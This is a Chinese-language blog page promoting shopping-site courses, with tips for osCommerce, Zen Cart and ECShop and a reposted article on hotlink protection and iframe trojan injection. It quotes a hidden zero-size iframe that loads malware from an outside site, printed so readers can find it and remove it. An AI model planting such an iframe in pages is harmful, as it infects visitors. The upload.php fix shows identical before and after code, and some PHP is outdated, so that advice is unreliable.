好消息公告:【最新購物網站架站教學】購物網站購物車五大天王:osCommerce、Twe-Commerce、Zen Cart、xt:Commerce、ecshop 實況錄影架站教學課程已經完成製作,保有【osCommerce最完整購物網站架站教學】DVD課程郵寄到府函授課程外,另增加購物車四大天王:Twe-Commerce、Zen Cart、xt:Commerce、ecshop 實況架站線上錄片架站教學
(份量增加很多價格還是不變!)限期30天。
最新課程表:http://por.tw/sale/cmmerse-4-all/index.php


特訓密技基地總教頭
ster168ster@gmail.com
English Sentence Loading...
英語句子加載中...
瀏覽模式: 普通 | 清單

[轉貼] ECSHOP防盜連及駭客iframe攻擊模式

原著:http://bbs.ecshop.tw/thread-593-1-1.html

一.網站防盜連
首先,防盜連只防君子不防小人,所以認真說還是有辦法被破解
在 Apache 中可以用 .htaccess 來做一些簡單的安全性、認證相關的設定。
開啟 httpd.conf 後,將下面這行修改一下,再新啟動 Apache
AllowOverride None 改成 AllowOverride All

防盜連常見方法一
轉自PCZONE
那麼請在.htaccess檔案加入下面
(以下這樣設定代表:除了自己網站以及PCZONE網站,其他網站仍無法盜連你站內的資料)
SetEnvIfNoCase Referer "^http://www.pczone.com.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://pczone.com.tw/" local_ref=1
SetEnvIfNoCase Referer "^http://自己網站/" local_ref=1
SetEnvIfNoCase Referer "^http://www.google.com/" local_ref=1
SetEnvIfNoCase Referer "^http://google.com/" local_ref=1
<FilesMatch ".(txt|doc|gif|jpg|mp3)"> 
Order Allow,Deny
Allow from env=local_ref
Allow from google.com
Allow from 127.0.0.1
Allow from 202.43.85.163 <-這個IP,是PCZONE網站的固定IP
</FilesMatch>

另一改 httpd.conf 方法
<Directory "C:/Apache2/htdocs/XXXXX">
SetEnvIfNoCase Referer "^http://www.yahoo.com.tw/" local_ref=1
<FilesMatch ".(gif|jpg|wmv|wma|swf|rm|rmvb|mp3|mid|exe|zip)">
Order Allow,Deny
Allow from env=local_ref
Allow from 127.0.0.1
Allow from
http://www.yahoo.com/
Allow from http://www.yahoo.com.tw/
</FilesMatch>
</Directory>

讓 kuso.in/kuso/x.php 限制連 這個 php 不能直接連結.除了自己網站和yahoo
用 Location 來指出該檔案url 位置
<Location /kuso/x.php>
order allow,deny
Allow from 127.0.0.1
Allow from
http://www.yahoo.com/
Allow from http://www.yahoo.com.tw/
......
</Location>

同理.封鎖特定的IP做這些設定
<FilesMatch ".x">
order deny,allow
allow from all
deny from 192.168.1
deny from 192.168.2.1
</FilesMatch>


.htaccess 放的位置也會有差別,.htaccess 的作用範圍,只有放置該檔的目錄,以及其下的子目錄才會有作用。是目錄不是網址喔。如果其它的目錄已經有另外設定過權限的話,要檢查一下權限有沒有衝突。

下面是白話文-linux下 參考範例 轉自
更改前 這個是帶 rewrite 的
<VirtualHost *:80>
DocumentRoot /home/www
ServerName
http://www.yourdomin.com/
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
RewriteRule ^/supesite/index([.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

改完後
<VirtualHost *:80>
DocumentRoot /home/www
ServerName
http://www.yourdomin.com/
SetEnvIfNoCase Referer "^http://www.yourdomin.com" local_ref=1
SetEnvIfNoCase Referer "^http://yourdomin.com" local_ref=1
<FilesMatch ".(txt|doc|mp3|zip|rar|jpg|gif)">
Order Allow,Deny
Allow from env=local_ref
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^/supesite/([0-9]+)/spacelist(.*)$ /supesite/index.php?$1/action_spacelist$2
RewriteRule ^/supesite/([0-9]+)/viewspace_(.+)$ /supesite/index.php?$1/action_viewspace_itemid_$2
RewriteRule ^/supesite/([0-9]+)/viewbbs_(.+)$ /supesite/index.php?$1/action_viewbbs_tid_$2
RewriteRule ^/supesite/([0-9]+)/(.*)$ /supesite/index.php?$1/$2
RewriteRule ^/supesite/([0-9]+)$ /supesite/index.php?$1
RewriteRule ^/supesite/action_(.+)$ /supesite/index.php?action_$1
RewriteRule ^/supesite/category_(.+)$ /supesite/index.php?action_category_catid_$1
RewriteRule ^/supesite/itemlist_(.+)$ /supesite/index.php?action_itemlist_catid_$1
RewriteRule ^/supesite/viewnews_(.+)$ /supesite/index.php?action_viewnews_itemid_$1
RewriteRule ^/supesite/viewthread_(.+)$ /supesite/index.php?action_viewthread_tid_$1
RewriteRule ^/supesite/index([.a-zA-Z0-9]*)$ /supesite/index.php
</IfModule>
</VirtualHost>

防盜連常見方法補充 ~另一種防盜方法
這種我還沒試過.有試過的請發表一下
租空間的用戶,透過Apache的.htaccess來設置防盜連功能(anti hotlink),是最方便的
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^http://yblog.org/*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://yblog.org/$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org/*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.yblog.org/$ [NC]
RewriteRule .*.(jpg|gif|png|bmp|rar|zip|exe)$ /content/no_hotlink.jpeg [R,NC]
如果你想在自己的網站主機上也使用這樣的防盜連功能,生成一個.htaccess文件放到你欲限制的目錄(根目錄最好避免,在根目錄使用的. htaccess建議用作其它用途,欲限制的目錄下才放本文設定的防盜連方式)。在Windows平台上如果發現自己無法產生.htaccess文件,可 以用記事本或其它的文字編輯軟體,另存新檔時,檔名選擇.htaccess即可
RewriteCond可指定從哪些域名來連線是許可的
RewriteRule則指定哪些附檔名類型不能被盜連(hotlink),後面可指定連結到某個錯誤訊息頁面,或是一張圖片。
如果RewriteRule這一行設定成RewriteRule .(jpg|jpeg|gif|png|bmp|rar|zip|exe)$ - [F],則表示盜連的人,會看到403錯誤訊息,顯示禁止存取(403 Forbidden)。

防盜連的PHP代碼[轉自163.com]
<?php

$ADMIN[defaulturl] = "http://www.163.com/404.htm";//盜鏈返回的地址
$okaysites = array("
http://www.163.com/","http://163.com/"); //白名單
$ADMIN[url_1] = "
http://www.163.com/download/";//下載地點1
$ADMIN[url_2] = "";//下載地點2,以此類推

$reffer = $HTTP_REFERER;
if($reffer) {
$yes = 0;
while(list($domain, $subarray) = each($okaysites)) {
if (ereg($subarray,"$reffer")) {
$yes = 1;
}
}
$theu = "url"."_"."$site";
if ($ADMIN[$theu] AND $yes == 1) {
header("Location: $ADMIN[$theu]/$file");
} else {
header("Location: $ADMIN[defaulturl]");
}
} else {
header("Location: $ADMIN[defaulturl]");
}

?> 
使用方法:將上述代碼保存為dao4.php,
比如測試用的validatecode.rar在站點
http://163.com/download裡面,
則用以下代碼表示下載連接. 
文件名?site=1&file=文件 
EXP:
http://www.cndw.com/dao4.php?site=1&;file=validatecode.rar

防框架嵌入方法和源代碼 轉自
<script type="text/javascript"><!--
if ( top.location !== self.location ) {
top.location=self.location;
}
//--></script>唯一的缺點是對禁用Javascript的瀏覽器無效,不管怎麼樣這是我看到的最好的解決辦法,在這裡強烈推薦!


二.駭客攻擊(iframe)
先引用資安論壇網友:
這是我的網站,因為會員反應說有木馬程式,可是我和主機商一直找不出來,想請各位幫忙
會員幫我偵出來是Troian horse病毒。
昨天有會員反應被人植入木馬程式,檢看原始碼發現多了下面代碼
<iframe src="
http://www.photosh.idv.tw/admin/board/_vti_cnf/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

找了一些index.htm和index.php不過都找不到這段原始碼,請問它應該是放在哪裡呢?
and再多問一個,會員向我反應後我一邊找網站檔案還是仍然找不到,一邊掃我電腦的毒不過我用了兩三個掃木馬的程式還是都掃不出來?我的網站目前被惡意放 進的程式(如上面的代碼)還沒移除,我還是一直在我的網站上東看西看,不知是程式掃不出來還是沒有中毒?請問這種情形上去的話一定會中毒嗎?因為我也沒有 安裝任何防毒軟體,只有掃毒軟體。
我剛剛下載了一個檢測伺服器木馬及惡意程式的safe程式,放在網站上執行,它說99%可以找出惡意程式,但我使用後還是都說正常....這種情形該怎麼辦呢?主機商叫我從資料庫搜尋相關字眼但也找不到~麻煩高手幫忙一下~~QQ"

請您先把資料庫的所以密碼用英數亂碼加大小寫編碼...把密碼先改過一次...然後去看是那一個論壇..使用的是那一個資料庫...搜尋 </iframe> .....就會找到你說的那些資料了..看到多少全都砍了...
通常不會只發生在你現在這個資料庫而已...還會在你主機的另外的資料庫上...
只要你的網站夠熱門...就有人會想破你的資料庫植入以上的內崁式木馬...只要到你的論壇後...他會自動連結到別的網站..就中標了.....我有幫一位朋友開一個論壇...他的密碼太過簡單而被破後...接著就所有的資料庫都被植入類似的木碼網站..

<iframe是html的內置框架,也就是會讀對方的程式進來,不過他的高跟寬都設為0所以看不見,我也遇到,除了寫html檔之外可能會寫入flash檔,感染html或是asp相關網頁的檔案..

解析iFrame攻擊手法 .請參考這裡一篇文章 計世網

可能影響 -Google搜尋你的網站出現「這個網站可能會損害你的電腦」
當遇上網路釣魚.惡意網站連結...等同時,還可能遇到 Google搜尋出現「這個網站可能會損害你的電腦」情況
以下解決方式請自行到R大 的 慢條斯理的溫柔 去看 .雖然文中只提到遭到攻擊然後植入怪怪的連結.個人猜也許是iFrame攻擊手法 .不過也許不是.但是.遇到 Google搜尋出現「這個網站可能會損害你的電腦」這種情況 ..可ˇ以參考R大方式處理

osCommerce 安裝時Session 儲存於→選擇【檔案】與【資料庫】之差異?

有很多人在安裝osCommerce購物是網站程式架設購物時,糊里糊塗
亂按下一步
結果在安裝後發生警告字串(Session 找不到目錄夾!)
因為是英文,初學者或是看不懂警告語的意思的人,就不知道怎樣處理?
甚至想要自己架設購物網站的夢想就因此無法前進了!真是可惜!
其實這問題是出現在安裝時的『session 的儲存方式』

attachments/201109/7492380643.png

Session 儲存於:選擇 session 的儲存方式,如果選擇檔案,必須在設定檔內定義儲存的目錄及路徑且必須在主機該路徑下建立該目錄 (/tmp or c: mp)
若選擇 mysql【資料庫】 方式,則 seesion 會存入資料庫。
你這下子懂了吧?
Session 儲存於:預設是檔案
所以不選擇就亂按下一步,到最後當然要自己在本地端或虛擬主機有自己建立 (/tmp or c: mp)目錄夾!不然就會出現發生警告字串(Session 找不到目錄夾!)
解決辦法:當然是自己建立 (/tmp or c: mp)目錄夾囉!
當然如果當初安裝時,選擇mysql【資料庫】就不會發生這種『鳥事』啦!

解開:register_globals應該是:ON或是OFF的疑惑

解開:register_globals應該是:ON或是OFF的疑惑

購物網站架設時:Oscommerce 安裝一開始,若是原始碼 register_globals = Off是無法安裝的。

如果你是租用虛擬主機(不能自己修改php.ini時)不妨考慮安裝:Twe-Commercs
因為Twe-Commercs剛好相反!register_globals = Off是可以安裝的!

購物網站架設時:ZenCart 安裝一開始,若是原始碼 register_globals = On 會出現安全問號。

入口內容站架設時:Joomla 安裝一開始,若是原始碼 register_globals = On  是無法安裝的。


那 register_globals 應該是:ON或是OFF才好呢?

用Google搜尋到這篇文章,或許可以解開大家的疑惑。

2006-09-05 PHP多項未指明的漏洞 ( 資料來源:SecurityFocus )
PHP 在zend_hash_del()的功能中發現一個弱點。對於信任使用unset函數的PHP程式,攻擊者可以用暴力法傳遞任意初始化的函數。
這個漏洞對於將參數register_globals預設為「開啟(enable) 」的系統影響特別明顯,在Red Hat Enterprise Linux中register_globals預設成「關閉 (disable)

因此要把register_globals設為On,又能安裝或是使用Oscommerce,可以下載patch檔後覆蓋。

它的 readme 說明檔如下:

引用:
CHANGES TO REMOVE register_globals REQUIREMENT - V 1.5 - Richard Bentley 01/09/2006
-----------------------------------------------------------------------------------

Before proceding, read the README file !

In this directory, you will find a set of files that have been pre-patched. The net result
is exactly the same as applying the patch instructions yourself.

There are 13 files in total that have replacements. These are as follows :

Admin...
---------
.../admin/products_attributes.php
.../admin/includes/application_top.php
.../admin/includes/functions/general.php
.../admin/includes/functions/sessions.php

On a default installation of OSC, the 'admin' directory is actually contained within the
'catalog' directory (ie .../catalog/admin/), but I have split it out here to make the
division clearer (as an aside, you will find that if you move admin/ out of catalog/,
it makes the admin section somewhat more straightforward to secure, but this is outside
the scope of this patch)

Catalogue...
------------
.../catalog/install/includes/application.php

NOTE: If you have already installed OSC (ie - run through the installation procedure),
---- then the above file may not exist (in which case you should not add it back in
with the replacement file); once installation of OSC is complete, you should
delete the whole of the .../catalog/install/ directory - it is not needed after
installation and having it hanging around is a security risk

.../catalog/includes/application_top.php
.../catalog/include/classes/order.php
.../catalog/includes/functions/general.php
.../catalog/includes/functions/gzip_compression.php
.../catalog/includes/functions/sessions.php
.../catalog/includes/languages/english/password_forgotten.php
.../catalog/includes/languages/espanol/password_forgotten.php
.../catalog/includes/languages/german/password_forgotten.php

NOTE: I have NOT included a pre-patched version of the easypopulate file. This is because
---- it will probably be out of date by the time you read this. Instead, if you need to
patch easypopulate (if it STILL needs patching, and by now it really should have been
reworked so that it doesn't need patching) then refer to the manual patching
instructions (the very last entry in the admin_patch text file will tell you what
you need to do - it's very simple... honest)

=======================================================
>>> WARNING <<<

These files are based on the MS 2.2 release, dated 17/09/2006 (ie - the
security/bugfix update #2 to the original MS 2.2). If you are using some other version
of OSC then I strongly suggest you apply this patch manually and NOT use these pre-patched
files. The exception to this is the security/bugfix release 13/11/2005; it is ok
to patch this version directly with these files; see the README file for more details

=======================================================
>>> WARNING <<<

If you have already applied some other changes (contributions/patches) to your OSC code
then make sure you are not blatting over those changes by copying these files over. If in
doubt then I strongly suggest you use the manual instructions in the 'patch_instructions'
directory and apply the patch line by line; despite what many people say, it really
doesn't take very long - it took me about 20 minutes!

=======================================================
INSTALLATION
------------

1/ Copy the above files to their appropriate places in your existing OSC code tree

2/ Make sure you set the permissions of the replacement files appropriately for the
environment you are using. If you fancy getting the shit hacked out of you then
feel free to set permissions of '777'. If you fancy something a tad more secure
then I suggest engaging brain and thinking about it :-)
If you don't KNOW how to set some sensible file pemissions then find yourself
a good text book and learn how to use your computer

3/ It's been mentioned in the README file already, but once you have made this
change, you MUST disable the register_globals option in php.ini

ie, in php.ini :

register_globals = Off

=======================================================

參考下載網頁: http://www.oscommerce.com/community/contributions,2097/category,all/search,register_globals

用XOOPS架設【購物網站】平台(完全中文化版)

用XOOPS架設【購物網站】平台(完全中文化版)

什麼是 XOOPS?
XOOPS (eXtended Object-Oriented Portal System)為新一代網站內容管理系統(CMS, Content Management Systems)。
所謂網站CMS,其網頁發展概念不同於以往的方式。
傳統網站的架設與後續的維護,需要用的網頁編寫及管理軟體,如微軟的FrontPage或最近流行的 DreamWeaver等。
這種方式架設的網站由於技術門檻相當高,往往需要專人來負責。
相對的使用網站內容管理系統CMS,網站管理者可以很方便的對網站進行管理與設定的動作。

XOOPS是一套相當方便、實用的免費架站程式,除了提供一般的討論區、會員管理、群組管理、文章管理…等機制,也可以裝上購物車模組,讓你的XOOPS網站升級為購物網站!
時常有網友曾問『總教頭』:XOOPS可不可以升級為購物網站?其實XOOPS是可以安裝【購物網站】模組的。此購物車系統合併了iePay付款機制及離線ATM轉帳的金流功能,所以是一個非常完整的購物車模組。
你可以從iePay的官方網站下載XOOPS購物車模組。
因為下載後我發現『Paypal的外掛』語系還是英文,所以總教頭就順手把它中文化了!
請點擊下面的連結(可以下載XOOPS架設【購物網站】模組完全中文化版):

 
http://por.tw/Downloads/xoops_iepay_car.rar


注意:裡面有兩個版本(Big5與UTF-8)請先確認自己 XOOPS網站是何種編碼?

安裝的方式完全依照我Xoops2架站(新增模組)的方式就可以順利完成!

http://por.tw/Website_Design/E_learning/index.php

如果你是註冊學員還有不懂之處,可以循學員技術諮詢方式問我!

【文章標題】: 購物網站osCommerce-安裝時出現:安裝路徑目錄下upload.php 第31行錯誤的處理方法
【文章作者】: 購物網站架站經營密訓基地-總教頭
【作者信箱】:
steven8ster@gmail.com
【作者首頁】: http://por.tw/sale
【內容分類】: 學員來函(技術諮詢處理)
【基地主機】:
http://visdacom.com/sale
【版權聲明】: 本文【原創】購物網站架站經營密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------
【文章內容】
  購物網站osCommerce-安裝時出現:安裝路徑目錄下/admin/includes/classes/upload.php 第31行錯誤的處理方法
 
  學員來函(技術諮詢處理)
  學員之問題:
  購物網站osCommerce-安裝時出現以下錯誤:
  安裝路徑目錄下/admin/includes/classes/upload.php 第31行錯誤
  發生畫面如圖:

attachments/200904/6647580683.gif
  
  請問如何處理?
 
  (技術諮詢處理)回覆:
 
  請找到:安裝路徑目錄下/admin/includes/classes/upload.php 第30行:
 
  // self destruct
            unset($this);
 
            return false;
         
  修改更換成:
 
  // self destruct
            unset($this);
 
            return false;

資料庫 mysql 的中文亂碼解決【保証成功】專案

資料庫 mysql 的中文亂碼解決【保証成功】專案

在架站技術中常常有來信詢問各種 mysql 中文相容的問題。

資料庫mysql中文亂碼的原因不外乎下列幾點:

☆‧mysql server本身設定問題,例如還停留在 latin1

☆‧mysql table 的語系設定問題(包括 character 與 collation)

☆‧用戶端程式(例如 php) 的連線語系設定問題

請設定 mysql server/table 的 character/collation:

接下來只需要補充幾點注意事:

◎、mysql中文亂碼必勝解決法:

1、mysql 啟動時會讀取一個預設的 config 檔,一般名稱為 my.ini,而它會到下列兩位置去尋找這個檔案:

C:windowsmy.ini 也就是作業系統的安裝目錄,也有可能是 C:winntmy.ini
C::my.cnf 也就是 C disk 的根目錄

注意不同位置裏的檔案suffix不一樣,這點在之前的文章中沒有特別強調,因此那時我是用更複雜的方法直接重新將mysql 註冊到 service裏面,並在那裏指定 my.ini的位置。

2、my.ini 裏的內容為:

[mysqld]
default-character-set=utf8

[client]
default-character-set=utf8
init_connect='SET NAMES utf8'

其中 mysqld 是指定 server啟動時要用的語系,但如果這裏設定為 utf8可能會讓許多英文軟體不開心,例如 osCommerce/mediaWiki,所以這裏建議設成 latin1。

下面的 client 則是設定當 client 連線時要使用什麼語系,但可惜的是這個設定不是每個client都會鳥它,基本上只有 mysql 自已家的程式,例如 mysql.exe, mysqld.exe, mysqladmin.exe 或是 MySQL Control Center這種程式會去讀取這個設定檔然後改用 utf8 連線。

在此提供第二行指令,比一支支php程式去設定connection setting更快,這樣應該也可以順便解決phpmyadmin無法正確顯示 unicode 中文的問題(不過 amfphp 到是不吃這套,一定要乖乖的自已設定語系才行)

但大部份專案師應該都是自已寫 php/jsp 程式去連線,此時自然不會讀取這個設定而繼續使用預設的語系 - latin1。

這也正是大部分網友陣亡的地方。

可以用一個獨立的檔案來處理 mysql connection的設定,例如:

PLAIN TEXT
PHP:

<?
//database connection details.
$host = "localhost";
$link = mysql_connect($host, "xxx", "xxx");
mysql_query("SET NAMES 'utf8'");
mysql_select_db("your_table_name_here", $link);
?>

請注意在 mysql_connect後第五行的地方有加上一個 "set names 'utf8' "的指令,告訴mysql 這個 connection 之後的連線內容都要使用utf8,經由這樣設定後,通常就可以解決大部份問題。

從這裏也可以推想得知,如果你有用某種custom connection pooling機制,就要記得在每次建立新的connection後立即設定為 utf8。

這組設定經由幾天的反覆測試(使用中文繁、簡、日文、韓文)後已經証實完全不會有亂碼或是某些字變成 "口"。

例子:試者輸入這幾個字「不道可否囉」如果它們能正確進入mysql再被讀出來,那就是中文沒問題了,如果讀出來後變成『口』字那就是革命還未成功同志仍需努力...orz

當然我也順便檢查了 flex2 - amfphp - php - mysql 來回傳resultset 也不再會有中文亂碼問題,可以安心使用囉。

安裝ECSHOP 2.6.0為何會出現詢問:UCenter密碼?

有網友來信問道:安裝ECSHOP 2.6.0為何會出現詢問:UCenter密碼?
到底是怎樣的一回事?UCenter是什麼咚咚?

ECSHOP 2.6.0是大陸:康盛創想(北京)科技有限公司開發的產品
該公司旗下產品有:
Crossday Discuz! Board 論壇系統 簡稱 Discuz! 論壇
電子商務網站 ECShop
内容管理(CMS)SupeSite
X-Space 以 Blog 功能為核心,結合了圖片(相冊)、收藏、書籤(網摘)、好友圈等 Web2.0 套用元素,以及商品(商城)、檔案(下載)、友情連結等際網路流行套用。
SupeV 是Comsenz 開發的一套視訊部落格系統
UCenter 使用者中心
UCenter 的中文意思就是「使用者中心」,其中的 U 代表 User 也代表 You ,取其中的含義就是「使用者中心」,或是說「你(最終使用者)的中心」。

UCenter 是 Comsenz 旗下各個產品之間資訊直接傳遞的一個橋樑,通過 UCenter 站長可以無縫整合 Comsenz 系列產品,實現使用者的一站式登入以及社區其他資料的互動。

UCenter 擁有機制完善的介面,經由簡單修改便可以掛接其它任何平台的第三方的網路套用程式,隨時為您的社區論壇增加能量。這樣說明懂了吧?

從 ECShop 2.6.0 開始,以及 Discuz! 6.1.0 開始,
這兩套軟體都需要搭配 Ucenter 作為會員系統來使用。

附加檔案中為 Ucenter 1.0 之完美繁體中文版(繁體Utf-8版本),
直接下載後解壓縮,將Upload資料夾傳到您的空間中並執行安裝即可。

若需下載官方版本檔案,請到 http://comsenz.com/downloads

ECShop最大的免費網路商店系統-ecshop.v2.5.1.build0229(免費購物網站架站軟體)

attachments/200804/7737155081.jpg

ECShop是Comsenz公司推出的一款B2C獨立網店系統,適合企業及個人快速構建個性化網上商店。系統是基於PHP語系及MYSQL資料庫構架開發的跨平台開源程式。

ECShop悉心聽取每一位商家的需求與建議,不僅設計了人性化的網店管理系統說明商家快速上手,還根據中國人的購物習慣改進了購物流程,實現更好的使用者購物體驗。

經由近兩年的發展,ECShop網店系統無論在產品功能、穩定性、執行效率、負載能力、安全性和SEO支援(搜尋引擎改善)等方面都居國內同類產品領先地位,成為國內最流行的購物系統之一。

   1.靈活的模版機制:

      ECShop開發了獨有的高效範本引擎(2.15以前版本使用smarty範本引擎),並結合了Dreamweaver的範本和媒體庫功能,使得編輯製作範本變得更簡單。
   2.開放的外掛程式機制:

      支付、配送,會員整合都是以外掛程式形式實現。商家可以隨時增加或變更的支付模式和配送體系。ecshop支援大部分php開發的論壇系統,內含discuz,phpwind等,只需在後台做簡單參數配置,即可完成會員整合。
   3.功能 AJAX 化:

      ECSHOP 使用目前流行的 AJAX 技術,批量資料編輯變得更迅速,方便。
   4.促銷功能:

      ECSHOP提供了積分、紅包、贈品,奪寶奇兵等多種促銷方法。
   5.高效率的代碼和執行效能:

      通過改善代碼與資料庫結構,配合ecshop獨家設計的快取機制,在不考慮網速的情況下,網店動態頁面與純靜態頁面訪問速度相當。
   6.一般功能的更完善實現:

      針對一般功能尤其是後台管理和購物流程,ECShop進行了更簡潔的設計,實現更好的使用者體驗。
   7.搜尋引擎改善:

      在 SEO (搜尋引擎改善)上,ECShop獨家支援兩種 URL 重寫模式,並且是同類軟體中第一家支援 google / yahoo / microsoft 三家共同發佈的 sitemaps 0.9 網站索引規範,能夠為站台被搜尋引擎收錄做到最大限度的支援和說明。
   8.內建手機短信通訊閘:

      ECShop內建手機短信通訊閘,支援會員訊息群發,訂單提醒等功能。
   9.多語系支援:

      支援繁體,繁體,英文。
  10.原始碼開放:

      使用者可根據自己的需求對ECSHOP進行定制,延伸。

    ※、總教頭安裝一個示範網站(請進入觀看):

     http://por.tw/ecshop/

ECShop最大的免費網路商店系統-ecshop.v2.5.1.build0229(免費購物網站架站軟體)下載網址:
請先免費註冊→即可進入下載:

http://por.tw/learning/modules/mydownloads/viewcat.php?op=&cid=4

標籤: 網站日誌

Zen Cart在安裝後安全建議:修改管理頁面的admin目錄名稱

****************************************************************
出於安全考慮,在安裝Zen Cart後,建議將admin目錄改名稱。
****************************************************************

attachments/201304/4886949997.png

如何變更Admin目錄名稱

在做任何修改前,請備份檔案和資料庫。 (備註:萬一出錯可以還原→原來資料庫)

1- 開啟檔案 admin/includes/configure.php.
將所有出現 /admin/ 的地方改成自己定義的名字
例如:topadmin

需要修改的部分:

// NOTE: be sure to leave the trailing '/' at the end of these lines if you make changes!
// * DIR_WS_* = Webserver directories (virtual/URL)
// these paths are relative to top of your webspace ... (ie: under the public_html or httpdocs folder)
define('DIR_WS_ADMIN', '/admin/');
define('DIR_WS_CATALOG', '/');
define('DIR_WS_HTTPS_ADMIN', '/admin/');
define('DIR_WS_HTTPS_CATALOG', '/');
-------------------------------------------------------------------------------------------------------
例如:(以修改topadmin為例子)
// NOTE: be sure to leave the trailing '/' at the end of these lines if you make changes!
// * DIR_WS_* = Webserver directories (virtual/URL)
// these paths are relative to top of your webspace ... (ie: under the public_html or httpdocs folder)
define('DIR_WS_ADMIN', '/topadmin/');
define('DIR_WS_CATALOG', '/');
define('DIR_WS_HTTPS_ADMIN', '/topadmin/');
define('DIR_WS_HTTPS_CATALOG', '/');
-------------------------------------------------------------------------------------------------------

需要修改的部分:

// * DIR_FS_* = Filesystem directories (local/physical)
//the following path is a COMPLETE path to your Zen Cart files. eg: /var/www/vhost/accountname/public_html/store/
define('DIR_FS_ADMIN', '/home/mystore.com/www/public/admin/');
define('DIR_FS_CATALOG', '/home/mystore.com/www/public/');

例如:(以修改topadmin為例子)
// * DIR_FS_* = Filesystem directories (local/physical)
//the following path is a COMPLETE path to your Zen Cart files. eg: /var/www/vhost/accountname/public_html/store/
define('DIR_FS_ADMIN', '/home/mystore.com/www/public/topadmin/');
define('DIR_FS_CATALOG', '/home/mystore.com/www/public/');

-------------------------------------------------------------------------------------------------------
2- 找到Zen Cart的目錄/admin/ 。將該目錄名按照 admin/includes/configure.php 中的定義作相應修改。
例如:把目錄/admin/修改成:topadmin

解釋:目的因為您使用Zen Cart的目錄admin,入侵的駭客很容易找到後台
      進而用入侵軟體去測出你的帳號及密碼,修改後台目錄名稱
      就找不到了(但是系統也要作對應才行!)

-------------------------------------------------------------------------------------------------------
【購物網站免費架站程式】 Zen Cart的.htaccess安全防護
下載解壓縮將.htaccess檔案上傳至安裝目錄下!
http://por.tw/Downloads/Zen.Cart.htaccess.rar
提醒您注意件事:.htaccess上傳時必須修改
 
.htaccess,並修改其中的 /shop/ 為您的zen cart目錄。
若果Zen Cart安裝在網頁伺服器的根目錄下,就設定為 /

phpMyAdmin 2.7.0(含)以上版本 中文顯示亂碼問題解決(基本設定)

在升級 PHPMyAdmin 時遇到中文字會出現亂碼的問題解決方法,分享一下如何修改。
設定檔名區別:

config.ini.php v 2.6.0 之前的名稱

config.default.php v 2.6.0(含) 之後的名稱

應更改事項:
$cfg['PmaAbsoluteUri'] = ''; -> $cfg['PmaAbsoluteUri'] = '
http://xxx.xxx.xxx.xxx/PHPMyAdmin/'; phpmyadmin 位置
$cfg['Servers'][$i]['auth_type'] = 'config'; -> $cfg['Servers'][$i]['auth_type'] = ' http'; http 認証
oth:
$cfg['Servers'][$i]['host'] = 'localhost'; // MySQL hostname or IP address 把localhost改成你的MySQL主機位置, 也就是 DB Hostname
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';   // MySQL user 把root改成你的MySQL資料庫的使用者名稱, 也就是 DB Username
$cfg['Servers'][$i]['password'] = ''; // MySQL password (only needed 在''中間填入你的MySQL資料庫的密碼, 也就是 DB Password
問題:
MySQL資料庫的內容顯示亂碼問題
解決方式:
select_lang.lib.php 這個檔案內容
'big5' => 'big5', 更改 'big5' => 'latin1',
'utf-8' => 'utf-8', 更改 'utf-8' => ' latin1',


架設網站時,有些學新手會很疑惑?
架站程式編碼在台灣有 Big5 與 UTF-8 兩種
那應該安裝那一種比較好?
------------------------------------------------------
網路有文章說:
BIG5 <----比較會出現 亂碼?
UTF-8<----比較不會出現 亂碼?
但是BIG5 外掛程式比較多?
其實這些都是:舊文章,此些問題目前已經不是正確的!

attachments/201304/5426035681.gif

--------------------------------------------------------------------
【文章標題】: 架站程式在台灣有 Big5編碼 與 UTF-8 編碼,你該安裝那一種?
【文章作者】: 購物網站架站教學密訓基地
【作者信箱】: ster168ster@gmail.com
【作者首頁】: http://por.tw/sale/
【購物網站架站教學課程】: http://por.tw/sale/cmmerse-4-all/index.php
【基地主機】: http://goto1688.com/sale/
【版權聲明】: (原創)購物網站架站教學密訓基地,轉載必須保留完整標頭。刪除者依法追究!
--------------------------------------------------------------------------------
UTF-8是國際碼:可以同時正常顯示繁體中文、簡體中文、日文、韓文…等字體

big-5編碼:主要是台灣、香港用的繁體中文,有所謂的『許、蓋、功....』亂碼問題(無法顯示簡體....等)

gb2312編碼:對岸使用的編碼方式,為簡體中文(無法顯示繁體....等)

基本上UTF-8擁有多國語言顯示的優勢,個人認為是未來網頁的主要編碼方式,能排除語言轉換的障礙

簡單的說,當你架設utf-8版本的論壇,那麼文章內容可以正常顯示多國語言而不會有亂碼問題

觀察所有開源架站程式後,可以發現utf-8已是主流

如:Wordpress、Joomla!、Xoops2、PHPbb3、osCommerce、Twe-Commerce、Drupal......等等

Big5會慢慢被淘汰!這也是為啥很多人,到後來想盡辦法想要將Big5轉成UTF-8的原因

--------------------------------------------------------------------------------
你在自己摸索如何架設購物網站.經商.網路賺錢嗎?您有【技術顧問服務】可諮詢嗎?
有問題無法解決要發很多時間處理(或許永遠找出答案)是自己摸索購物架站痛苦的開始!
購買【購物網站架站教學】DVD課程,就可獲得【購物網站架站】技術【顧問諮詢服務】!
